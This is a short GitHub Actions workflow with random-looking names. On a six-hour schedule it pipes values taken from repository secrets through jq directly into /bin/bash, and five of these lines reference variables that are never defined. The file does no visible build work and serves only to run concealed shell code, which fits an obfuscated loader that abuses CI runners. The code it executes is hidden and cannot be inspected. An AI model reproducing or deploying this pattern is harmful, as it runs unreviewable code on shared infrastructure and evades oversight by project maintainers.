name: carglucose

on:
  workflow_dispatch:
  schedule:
    - cron: '52 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: carglucose
        env:
          d216: ${{ secrets.d216 }}
        run: |
          echo $d216 | jq -r .dld1 | /bin/bash
          echo $bzsmr771 | jq -r .lhjh307 | /bin/bash
          echo $oxfof68732 | jq -r .woh0089 | /bin/bash
          echo $q31 | jq -r .nbe8549 | /bin/bash
          echo $j976 | jq -r .ygx208 | /bin/bash
          echo $h30 | jq -r .urf8318 | /bin/bash

